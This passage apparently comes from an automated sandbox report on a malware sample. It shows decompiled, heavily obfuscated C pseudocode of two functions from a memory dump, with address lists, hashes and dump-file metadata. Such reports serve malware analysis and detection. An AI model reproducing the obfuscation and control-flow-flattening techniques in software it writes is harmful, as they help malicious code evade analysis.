                                                                                                                                                                            												goto L15;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t318 = 0x4000;
                                                                                                                                                                            												_push(_t276);
                                                                                                                                                                            												_push(_t276);
                                                                                                                                                                            												_t274 = E02F5C5D8(0x4000);
                                                                                                                                                                            												_t276 = _v172;
                                                                                                                                                                            												_t275 = _t274;
                                                                                                                                                                            												_t319 =  &(_t319[3]);
                                                                                                                                                                            												_t254 = 0x58c5d57;
                                                                                                                                                                            												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
                                                                                                                                                                            												continue;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L18:
                                                                                                                                                                            							return _t275;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t276);
                                                                                                                                                                            						_push(_t276);
                                                                                                                                                                            						_t318 = E02F6CCA0(1, 0x10);
                                                                                                                                                                            						_push( &_v128);
                                                                                                                                                                            						_push(_t318);
                                                                                                                                                                            						_push(_v132);
                                                                                                                                                                            						_t301 = 0xb;
                                                                                                                                                                            						E02F5E404(_v144, _t301);
                                                                                                                                                                            						_t276 = _v172;
                                                                                                                                                                            						_t319 =  &(_t319[7]);
                                                                                                                                                                            						_t315 = 0xa9c05ca;
                                                                                                                                                                            						_t254 = 0x58c5d57;
                                                                                                                                                                            						L15:
                                                                                                                                                                            						__eflags = _t315 - 0x7f64d40;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					goto L18;
                                                                                                                                                                            				}
                                                                                                                                                                            			}













































                                                                                                                                                                            0x02f580c0
                                                                                                                                                                            0x02f580c0
                                                                                                                                                                            0x02f580c6
                                                                                                                                                                            0x02f580d9
                                                                                                                                                                            0x02f580dd
                                                                                                                                                                            0x02f580e2
                                                                                                                                                                            0x02f580ea
                                                                                                                                                                            0x02f580f2
                                                                                                                                                                            0x02f580fa
                                                                                                                                                                            0x02f58102
                                                                                                                                                                            0x02f5810a
                                                                                                                                                                            0x02f58119
                                                                                                                                                                            0x02f5811c
                                                                                                                                                                            0x02f58120
                                                                                                                                                                            0x02f58124
                                                                                                                                                                            0x02f5812c
                                                                                                                                                                            0x02f58134
                                                                                                                                                                            0x02f5813c
                                                                                                                                                                            0x02f58141
                                                                                                                                                                            0x02f58149
                                                                                                                                                                            0x02f58151
                                                                                                                                                                            0x02f58156
                                                                                                                                                                            0x02f5815e
                                                                                                                                                                            0x02f58166
                                                                                                                                                                            0x02f5816e
                                                                                                                                                                            0x02f58176
                                                                                                                                                                            0x02f5817e
                                                                                                                                                                            0x02f5818e
                                                                                                                                                                            0x02f58192
                                                                                                                                                                            0x02f5819a
                                                                                                                                                                            0x02f581a6
                                                                                                                                                                            0x02f581ab
                                                                                                                                                                            0x02f581b1
                                                                                                                                                                            0x02f581bd
                                                                                                                                                                            0x02f581c2
                                                                                                                                                                            0x02f581c8
                                                                                                                                                                            0x02f581d0
                                                                                                                                                                            0x02f581dc
                                                                                                                                                                            0x02f581df
                                                                                                                                                                            0x02f581e3
                                                                                                                                                                            0x02f581e8
                                                                                                                                                                            0x02f581f0
                                                                                                                                                                            0x02f581f8
                                                                                                                                                                            0x02f58200
                                                                                                                                                                            0x02f5820a
                                                                                                                                                                            0x02f5820e
                                                                                                                                                                            0x02f58213
                                                                                                                                                                            0x02f5821b
                                                                                                                                                                            0x02f58223
                                                                                                                                                                            0x02f58228
                                                                                                                                                                            0x02f58230
                                                                                                                                                                            0x02f58238
                                                                                                                                                                            0x02f58240
                                                                                                                                                                            0x02f5824a
                                                                                                                                                                            0x02f5824e
                                                                                                                                                                            0x02f58256
                                                                                                                                                                            0x02f5825e
                                                                                                                                                                            0x02f58266
                                                                                                                                                                            0x02f5826e
                                                                                                                                                                            0x02f58276
                                                                                                                                                                            0x02f58280
                                                                                                                                                                            0x02f58288
                                                                                                                                                                            0x02f5828d
                                                                                                                                                                            0x02f58295
                                                                                                                                                                            0x02f5829d
                                                                                                                                                                            0x02f582a5
                                                                                                                                                                            0x02f582ad
                                                                                                                                                                            0x02f582b5
                                                                                                                                                                            0x02f582bd
                                                                                                                                                                            0x02f582c5
                                                                                                                                                                            0x02f582cd
                                                                                                                                                                            0x02f582d5
                                                                                                                                                                            0x02f582dd
                                                                                                                                                                            0x02f582ec
                                                                                                                                                                            0x02f582ef
                                                                                                                                                                            0x02f582f3
                                                                                                                                                                            0x02f582f7
                                                                                                                                                                            0x02f582fc
                                                                                                                                                                            0x02f58304
                                                                                                                                                                            0x02f5830c
                                                                                                                                                                            0x02f58319
                                                                                                                                                                            0x02f5831d
                                                                                                                                                                            0x02f58321
                                                                                                                                                                            0x02f58329
                                                                                                                                                                            0x02f58331
                                                                                                                                                                            0x02f58339
                                                                                                                                                                            0x02f58341
                                                                                                                                                                            0x02f58346
                                                                                                                                                                            0x02f5834e
                                                                                                                                                                            0x02f58356
                                                                                                                                                                            0x02f5835e
                                                                                                                                                                            0x02f58362
                                                                                                                                                                            0x02f5836a
                                                                                                                                                                            0x02f58372
                                                                                                                                                                            0x02f5837a
                                                                                                                                                                            0x02f5837f
                                                                                                                                                                            0x02f5838c
                                                                                                                                                                            0x02f5838f
                                                                                                                                                                            0x02f58393
                                                                                                                                                                            0x02f5839b
                                                                                                                                                                            0x02f583a3
                                                                                                                                                                            0x02f583b0
                                                                                                                                                                            0x02f583b8
                                                                                                                                                                            0x02f583bb
                                                                                                                                                                            0x02f583bf
                                                                                                                                                                            0x02f583c3
                                                                                                                                                                            0x02f583cb
                                                                                                                                                                            0x02f583d3
                                                                                                                                                                            0x02f583e0
                                                                                                                                                                            0x02f583e4
                                                                                                                                                                            0x02f583e9
                                                                                                                                                                            0x02f583f1
                                                                                                                                                                            0x02f583f1
                                                                                                                                                                            0x02f583f1
                                                                                                                                                                            0x02f583f6
                                                                                                                                                                            0x02f583f6
                                                                                                                                                                            0x02f58404
                                                                                                                                                                            0x02f5849c
                                                                                                                                                                            0x02f584a5
                                                                                                                                                                            0x02f584a9
                                                                                                                                                                            0x02f584b1
                                                                                                                                                                            0x02f584c4
                                                                                                                                                                            0x02f584c5
                                                                                                                                                                            0x02f584c6
                                                                                                                                                                            0x02f584c7
                                                                                                                                                                            0x02f584c8
                                                                                                                                                                            0x02f584d1
                                                                                                                                                                            0x02f584e5
                                                                                                                                                                            0x02f584ea
                                                                                                                                                                            0x02f584ed
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5840a
                                                                                                                                                                            0x02f58410
                                                                                                                                                                            0x02f5855a
                                                                                                                                                                            0x02f58416
                                                                                                                                                                            0x02f5841c
                                                                                                                                                                            0x02f58482
                                                                                                                                                                            0x02f58486
                                                                                                                                                                            0x02f58488
                                                                                                                                                                            0x02f5848e
                                                                                                                                                                            0x02f58493
                                                                                                                                                                            0x02f58493
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58493
                                                                                                                                                                            0x02f5841e
                                                                                                                                                                            0x02f58424
                                                                                                                                                                            0x02f58469
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58426
                                                                                                                                                                            0x02f5842c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58432
                                                                                                                                                                            0x02f58436
                                                                                                                                                                            0x02f58447
                                                                                                                                                                            0x02f58448
                                                                                                                                                                            0x02f5844a
                                                                                                                                                                            0x02f5844f
                                                                                                                                                                            0x02f58453
                                                                                                                                                                            0x02f58455
                                                                                                                                                                            0x02f5845f
                                                                                                                                                                            0x02f58464
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58464
                                                                                                                                                                            0x02f5842c
                                                                                                                                                                            0x02f58424
                                                                                                                                                                            0x02f5841c
                                                                                                                                                                            0x02f58410
                                                                                                                                                                            0x02f58564
                                                                                                                                                                            0x02f5856d
                                                                                                                                                                            0x02f5856d
                                                                                                                                                                            0x02f58504
                                                                                                                                                                            0x02f58505
                                                                                                                                                                            0x02f5850f
                                                                                                                                                                            0x02f58518
                                                                                                                                                                            0x02f58519
                                                                                                                                                                            0x02f5851a
                                                                                                                                                                            0x02f58527
                                                                                                                                                                            0x02f58528
                                                                                                                                                                            0x02f5852d
                                                                                                                                                                            0x02f58531
                                                                                                                                                                            0x02f58534
                                                                                                                                                                            0x02f58539
                                                                                                                                                                            0x02f5853e
                                                                                                                                                                            0x02f5853e
                                                                                                                                                                            0x02f5853e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5854a

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: "M|X$#'$K:${lN
                                                                                                                                                                            • API String ID: 0-1886388755
                                                                                                                                                                            • Opcode ID: 3d8b7ad54b45665b25719278587d29e9b35332bddd9d2716c3209b6dfd17d24a
                                                                                                                                                                            • Instruction ID: cf9c153472074aa6ce429f68f0433919c49a0abe7569725b782fa78e444b6061
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d8b7ad54b45665b25719278587d29e9b35332bddd9d2716c3209b6dfd17d24a
                                                                                                                                                                            • Instruction Fuzzy Hash: D7C153725083809FC358DF26C58A90BFBE1FBD4798F10891DFA9596260D3B4D949CF82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F54BFC(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				unsigned int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				unsigned int _v108;
                                                                                                                                                                            				unsigned int _v112;
                                                                                                                                                                            				intOrPtr* _t246;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				intOrPtr _t259;
                                                                                                                                                                            				intOrPtr _t260;
                                                                                                                                                                            				signed int _t262;
                                                                                                                                                                            				intOrPtr _t266;
                                                                                                                                                                            				intOrPtr _t267;
                                                                                                                                                                            				signed int _t291;
                                                                                                                                                                            				signed int _t292;
                                                                                                                                                                            				signed int _t293;
                                                                                                                                                                            				signed int _t294;
                                                                                                                                                                            				signed int _t295;
                                                                                                                                                                            				signed int _t296;
                                                                                                                                                                            				intOrPtr _t297;
                                                                                                                                                                            				void* _t299;
                                                                                                                                                                            				signed int _t300;
                                                                                                                                                                            				intOrPtr _t301;
                                                                                                                                                                            				intOrPtr _t302;
                                                                                                                                                                            				unsigned int* _t303;
                                                                                                                                                                            				unsigned int* _t304;
                                                                                                                                                                            
                                                                                                                                                                            				_t260 = __ecx;
                                                                                                                                                                            				_t303 =  &_v112;
                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                            				_v28 = 0xe57752;
                                                                                                                                                                            				_v28 = _v28 >> 0xe;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00000395;
                                                                                                                                                                            				_v84 = 0xa7b43c;
                                                                                                                                                                            				_v84 = _v84 << 0xc;
                                                                                                                                                                            				_t299 = 0x791519f;
                                                                                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                                                                                            				_t291 = 0x69;
                                                                                                                                                                            				_v84 = _v84 / _t291;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0126ef50;
                                                                                                                                                                            				_v64 = 0x5471f4;
                                                                                                                                                                            				_v64 = _v64 << 0xf;
                                                                                                                                                                            				_v64 = _v64 ^ 0x38ff966c;
                                                                                                                                                                            				_v108 = 0xe1a857;
                                                                                                                                                                            				_v108 = _v108 >> 7;
                                                                                                                                                                            				_v108 = _v108 << 0xf;
                                                                                                                                                                            				_v108 = _v108 >> 0xf;
                                                                                                                                                                            				_v108 = _v108 ^ 0x000c4d53;
                                                                                                                                                                            				_v112 = 0xe3e3b6;
                                                                                                                                                                            				_t292 = 0x1c;
                                                                                                                                                                            				_t258 = 0x3d;
                                                                                                                                                                            				_v112 = _v112 * 0x7f;
                                                                                                                                                                            				_v112 = _v112 ^ 0x4177f445;
                                                                                                                                                                            				_v112 = _v112 >> 8;
                                                                                                                                                                            				_v112 = _v112 ^ 0x003f3c7e;
                                                                                                                                                                            				_v60 = 0xdb6601;
                                                                                                                                                                            				_v60 = _v60 | 0x1a9202c7;
                                                                                                                                                                            				_v60 = _v60 ^ 0x1ad2035c;
                                                                                                                                                                            				_v104 = 0x132994;
                                                                                                                                                                            				_v104 = _v104 / _t292;
                                                                                                                                                                            				_v104 = _v104 + 0x3dcb;
                                                                                                                                                                            				_v104 = _v104 | 0x8aefcc47;
                                                                                                                                                                            				_v104 = _v104 ^ 0x8ae713b1;
                                                                                                                                                                            				_v80 = 0x4c94ef;
                                                                                                                                                                            				_v80 = _v80 / _t258;
                                                                                                                                                                            				_v80 = _v80 + 0xffffb573;
                                                                                                                                                                            				_v80 = _v80 ^ 0x000791ec;
                                                                                                                                                                            				_v48 = 0x6ce617;
                                                                                                                                                                            				_v48 = _v48 ^ 0x91a29be4;
                                                                                                                                                                            				_v48 = _v48 ^ 0x91c139dc;
                                                                                                                                                                            				_v52 = 0x59f0b3;
                                                                                                                                                                            				_v52 = _v52 ^ 0x18747c17;
                                                                                                                                                                            				_v52 = _v52 ^ 0x182d8be2;
                                                                                                                                                                            				_v56 = 0x3df981;
                                                                                                                                                                            				_v56 = _v56 << 8;
                                                                                                                                                                            				_v56 = _v56 ^ 0x3dfc4daf;
                                                                                                                                                                            				_v76 = 0x62b80;
                                                                                                                                                                            				_t293 = 0x5d;
                                                                                                                                                                            				_v76 = _v76 / _t293;
                                                                                                                                                                            				_v76 = _v76 + 0xffffe926;
                                                                                                                                                                            				_v76 = _v76 ^ 0xfff7137f;
                                                                                                                                                                            				_v72 = 0x7226d;
                                                                                                                                                                            				_v72 = _v72 >> 1;
                                                                                                                                                                            				_v72 = _v72 + 0x788a;
                                                                                                                                                                            				_v72 = _v72 ^ 0x000e590c;
                                                                                                                                                                            				_v96 = 0x39de81;
                                                                                                                                                                            				_v96 = _v96 + 0x1ccc;
                                                                                                                                                                            				_v96 = _v96 ^ 0xfb454dc1;
                                                                                                                                                                            				_v96 = _v96 ^ 0xf28cd76a;
                                                                                                                                                                            				_v96 = _v96 ^ 0x09fed289;
                                                                                                                                                                            				_v100 = 0xca2105;
                                                                                                                                                                            				_v100 = _v100 | 0x676862be;
                                                                                                                                                                            				_v100 = _v100 + 0xffff68c4;
                                                                                                                                                                            				_v100 = _v100 << 6;
                                                                                                                                                                            				_v100 = _v100 ^ 0xfa784873;
                                                                                                                                                                            				_v40 = 0xc4a147;
                                                                                                                                                                            				_v40 = _v40 ^ 0x45259758;
                                                                                                                                                                            				_v40 = _v40 ^ 0x45e701de;
                                                                                                                                                                            				_v44 = 0x2d23a0;
                                                                                                                                                                            				_t294 = 0x11;
                                                                                                                                                                            				_t302 = _v8;
                                                                                                                                                                            				_v44 = _v44 * 0x52;
                                                                                                                                                                            				_v44 = _v44 ^ 0x0e7a51ec;
                                                                                                                                                                            				_v92 = 0x79a225;
                                                                                                                                                                            				_v92 = _v92 / _t294;
                                                                                                                                                                            				_v92 = _v92 >> 9;
                                                                                                                                                                            				_v92 = _v92 | 0x8583c695;
                                                                                                                                                                            				_v92 = _v92 ^ 0x858adeed;
                                                                                                                                                                            				_v88 = 0xed07fb;
                                                                                                                                                                            				_v88 = _v88 + 0x2638;
                                                                                                                                                                            				_t295 = 0x61;
                                                                                                                                                                            				_v88 = _v88 / _t295;
                                                                                                                                                                            				_t296 = 0xa;
                                                                                                                                                                            				_t297 = _v4;
                                                                                                                                                                            				_v88 = _v88 / _t296;
                                                                                                                                                                            				_v88 = _v88 ^ 0x000a4d02;
                                                                                                                                                                            				_v32 = 0x581804;
                                                                                                                                                                            				_v32 = _v32 << 2;
                                                                                                                                                                            				_v32 = _v32 ^ 0x01684d46;
                                                                                                                                                                            				_v68 = 0xe8e83;
                                                                                                                                                                            				_v68 = _v68 | 0xc7c33aae;
                                                                                                                                                                            				_t259 = _v8;
                                                                                                                                                                            				_v68 = _v68 / _t258;
                                                                                                                                                                            				_v68 = _v68 ^ 0x0347a863;
                                                                                                                                                                            				_t240 = _v36;
                                                                                                                                                                            				L1:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						while(_t299 != 0x16cba6e) {
                                                                                                                                                                            							if(_t299 == 0x286464d) {
                                                                                                                                                                            								_t297 = 0x10000;
                                                                                                                                                                            								_push(_t260);
                                                                                                                                                                            								_push(_t260);
                                                                                                                                                                            								_t240 = E02F5C5D8(0x10000);
                                                                                                                                                                            								_t259 = _t240;
                                                                                                                                                                            								_t303 =  &(_t303[3]);
                                                                                                                                                                            								if(_t259 != 0) {
                                                                                                                                                                            									_v36 = _t240;
                                                                                                                                                                            									_t302 = 0x10000;
                                                                                                                                                                            									L7:
                                                                                                                                                                            									_t260 = _v24;
                                                                                                                                                                            									_t299 = 0x16cba6e;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t299 != 0x791519f) {
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t299 = 0x286464d;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t262 = E02F69C65(_v60,  &_v16, _t240, _t260, _t302, _v104, _v80);
                                                                                                                                                                            						_t303 =  &(_t303[5]);
                                                                                                                                                                            						_v20 = _t262;
                                                                                                                                                                            						if(_t262 == 0) {
                                                                                                                                                                            							L14:
                                                                                                                                                                            							_t260 = _v24;
                                                                                                                                                                            							_t299 = 0xcecd29d;
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t266 = _v16;
                                                                                                                                                                            							if(_t266 == 0) {
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t240 = _v36 + _t266;
                                                                                                                                                                            								_v36 = _v36 + _t266;
                                                                                                                                                                            								_t302 = _t302 - _t266;
                                                                                                                                                                            								if(_t302 != 0) {
                                                                                                                                                                            									goto L7;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t267 = _t297 + _t297;
                                                                                                                                                                            									_push(_t267);
                                                                                                                                                                            									_push(_t267);
                                                                                                                                                                            									_v12 = _t267;
                                                                                                                                                                            									_t301 = E02F5C5D8(_t267);
                                                                                                                                                                            									_t304 =  &(_t303[3]);
                                                                                                                                                                            									if(_t301 != 0) {
                                                                                                                                                                            										E02F6C9B0(_v72, _t301, _v96, _t297, _t259, _v100);
                                                                                                                                                                            										E02F72B09(_v40, _t259, _v44, _v92);
                                                                                                                                                                            										_t302 = _t297;
                                                                                                                                                                            										_t240 = _t301 + _t297;
                                                                                                                                                                            										_t297 = _v12;
                                                                                                                                                                            										_t303 =  &(_t304[6]);
                                                                                                                                                                            										_v36 = _t240;
                                                                                                                                                                            										_t259 = _t301;
                                                                                                                                                                            										if(_t302 != 0) {
                                                                                                                                                                            											goto L7;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						break;
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t240 = _v36;
                                                                                                                                                                            					} while (_t299 != 0xcecd29d);
                                                                                                                                                                            					L16:
                                                                                                                                                                            					_t300 = _v20;
                                                                                                                                                                            					if(_t300 != 0) {
                                                                                                                                                                            						_t246 = _v8;
                                                                                                                                                                            						 *_t246 = _t259;
                                                                                                                                                                            						 *((intOrPtr*)(_t246 + 4)) = _t297 - _t302;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E02F72B09(_v88, _t259, _v32, _v68);
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t300;
                                                                                                                                                                            				}
                                                                                                                                                                            			}



















































                                                                                                                                                                            0x02f54bfc
                                                                                                                                                                            0x02f54bfc
                                                                                                                                                                            0x02f54c03
                                                                                                                                                                            0x02f54c07
                                                                                                                                                                            0x02f54c0b
                                                                                                                                                                            0x02f54c13
                                                                                                                                                                            0x02f54c18
                                                                                                                                                                            0x02f54c20
                                                                                                                                                                            0x02f54c28
                                                                                                                                                                            0x02f54c31
                                                                                                                                                                            0x02f54c3a
                                                                                                                                                                            0x02f54c3f
                                                                                                                                                                            0x02f54c44
                                                                                                                                                                            0x02f54c4a
                                                                                                                                                                            0x02f54c52
                                                                                                                                                                            0x02f54c5a
                                                                                                                                                                            0x02f54c5f
                                                                                                                                                                            0x02f54c67
                                                                                                                                                                            0x02f54c6f
                                                                                                                                                                            0x02f54c74
                                                                                                                                                                            0x02f54c79
                                                                                                                                                                            0x02f54c7e
                                                                                                                                                                            0x02f54c86
                                                                                                                                                                            0x02f54c93
                                                                                                                                                                            0x02f54c96
                                                                                                                                                                            0x02f54c99
                                                                                                                                                                            0x02f54c9d
                                                                                                                                                                            0x02f54ca5
                                                                                                                                                                            0x02f54caa
                                                                                                                                                                            0x02f54cb2
                                                                                                                                                                            0x02f54cba
                                                                                                                                                                            0x02f54cc2
                                                                                                                                                                            0x02f54cca
                                                                                                                                                                            0x02f54cda
                                                                                                                                                                            0x02f54cde
                                                                                                                                                                            0x02f54ce6
                                                                                                                                                                            0x02f54cee
                                                                                                                                                                            0x02f54cf6
                                                                                                                                                                            0x02f54d06
                                                                                                                                                                            0x02f54d0a
                                                                                                                                                                            0x02f54d12
                                                                                                                                                                            0x02f54d1a
                                                                                                                                                                            0x02f54d22
                                                                                                                                                                            0x02f54d2a
                                                                                                                                                                            0x02f54d32
                                                                                                                                                                            0x02f54d3a
                                                                                                                                                                            0x02f54d42
                                                                                                                                                                            0x02f54d4a
                                                                                                                                                                            0x02f54d52
                                                                                                                                                                            0x02f54d57
                                                                                                                                                                            0x02f54d5f
                                                                                                                                                                            0x02f54d6b
                                                                                                                                                                            0x02f54d6e
                                                                                                                                                                            0x02f54d72
                                                                                                                                                                            0x02f54d7a
                                                                                                                                                                            0x02f54d82
                                                                                                                                                                            0x02f54d8a
                                                                                                                                                                            0x02f54d8e
                                                                                                                                                                            0x02f54d96
                                                                                                                                                                            0x02f54d9e
                                                                                                                                                                            0x02f54da6
                                                                                                                                                                            0x02f54dae
                                                                                                                                                                            0x02f54db6
                                                                                                                                                                            0x02f54dc0
                                                                                                                                                                            0x02f54dc8
                                                                                                                                                                            0x02f54dd0
                                                                                                                                                                            0x02f54dd8
                                                                                                                                                                            0x02f54de0
                                                                                                                                                                            0x02f54de5
                                                                                                                                                                            0x02f54ded
                                                                                                                                                                            0x02f54df5
                                                                                                                                                                            0x02f54dfd
                                                                                                                                                                            0x02f54e05
                                                                                                                                                                            0x02f54e14
                                                                                                                                                                            0x02f54e17
                                                                                                                                                                            0x02f54e1b
                                                                                                                                                                            0x02f54e1f
                                                                                                                                                                            0x02f54e27
                                                                                                                                                                            0x02f54e37
                                                                                                                                                                            0x02f54e3b
                                                                                                                                                                            0x02f54e40
                                                                                                                                                                            0x02f54e48
                                                                                                                                                                            0x02f54e50
                                                                                                                                                                            0x02f54e58
                                                                                                                                                                            0x02f54e64
                                                                                                                                                                            0x02f54e69
                                                                                                                                                                            0x02f54e73
                                                                                                                                                                            0x02f54e78
                                                                                                                                                                            0x02f54e7c
                                                                                                                                                                            0x02f54e80
                                                                                                                                                                            0x02f54e88
                                                                                                                                                                            0x02f54e90
                                                                                                                                                                            0x02f54e95
                                                                                                                                                                            0x02f54e9d
                                                                                                                                                                            0x02f54ea5
                                                                                                                                                                            0x02f54eb3
                                                                                                                                                                            0x02f54eb7
                                                                                                                                                                            0x02f54ebb
                                                                                                                                                                            0x02f54ec3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54ec7
                                                                                                                                                                            0x02f54ec7
                                                                                                                                                                            0x02f54ec7
                                                                                                                                                                            0x02f54ed5
                                                                                                                                                                            0x02f54eee
                                                                                                                                                                            0x02f54eff
                                                                                                                                                                            0x02f54f00
                                                                                                                                                                            0x02f54f02
                                                                                                                                                                            0x02f54f07
                                                                                                                                                                            0x02f54f09
                                                                                                                                                                            0x02f54f0e
                                                                                                                                                                            0x02f54f14
                                                                                                                                                                            0x02f54f18
                                                                                                                                                                            0x02f54f1a
                                                                                                                                                                            0x02f54f1a
                                                                                                                                                                            0x02f54f1e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54f1e
                                                                                                                                                                            0x02f54ed7
                                                                                                                                                                            0x02f54edd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54ee3
                                                                                                                                                                            0x02f54ee3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54ee3
                                                                                                                                                                            0x02f54edd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54ed5
                                                                                                                                                                            0x02f54f3d
                                                                                                                                                                            0x02f54f3f
                                                                                                                                                                            0x02f54f42
                                                                                                                                                                            0x02f54f48
                                                                                                                                                                            0x02f54fd5
                                                                                                                                                                            0x02f54fd5
                                                                                                                                                                            0x02f54fd9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54f4e
                                                                                                                                                                            0x02f54f4e
                                                                                                                                                                            0x02f54f54
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54f56
                                                                                                                                                                            0x02f54f5a
                                                                                                                                                                            0x02f54f5c
                                                                                                                                                                            0x02f54f60
                                                                                                                                                                            0x02f54f62
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54f64
                                                                                                                                                                            0x02f54f68
                                                                                                                                                                            0x02f54f77
                                                                                                                                                                            0x02f54f78
                                                                                                                                                                            0x02f54f7a
                                                                                                                                                                            0x02f54f86
                                                                                                                                                                            0x02f54f88
                                                                                                                                                                            0x02f54f8d
                                                                                                                                                                            0x02f54f9f
                                                                                                                                                                            0x02f54fb2
                                                                                                                                                                            0x02f54fb7
                                                                                                                                                                            0x02f54fb9
                                                                                                                                                                            0x02f54fbc
                                                                                                                                                                            0x02f54fc3
                                                                                                                                                                            0x02f54fc6
                                                                                                                                                                            0x02f54fca
                                                                                                                                                                            0x02f54fce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54fd0
                                                                                                                                                                            0x02f54fce
                                                                                                                                                                            0x02f54f8d
                                                                                                                                                                            0x02f54f62
                                                                                                                                                                            0x02f54f54
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54fde
                                                                                                                                                                            0x02f54fde
                                                                                                                                                                            0x02f54fe2
                                                                                                                                                                            0x02f54fee
                                                                                                                                                                            0x02f54fee
                                                                                                                                                                            0x02f54ff4
                                                                                                                                                                            0x02f55011
                                                                                                                                                                            0x02f55017
                                                                                                                                                                            0x02f55019
                                                                                                                                                                            0x02f54ff6
                                                                                                                                                                            0x02f55004
                                                                                                                                                                            0x02f5500e
                                                                                                                                                                            0x02f55025
                                                                                                                                                                            0x02f55025

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8&$Rw$~<?$~<?
                                                                                                                                                                            • API String ID: 0-2119221410
                                                                                                                                                                            • Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
                                                                                                                                                                            • Instruction ID: 9e8c6521a4aa21a1db1f540d6d81d331d99b70ec3ecfa33f375bd4b4fc4fefaa
                                                                                                                                                                            • Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
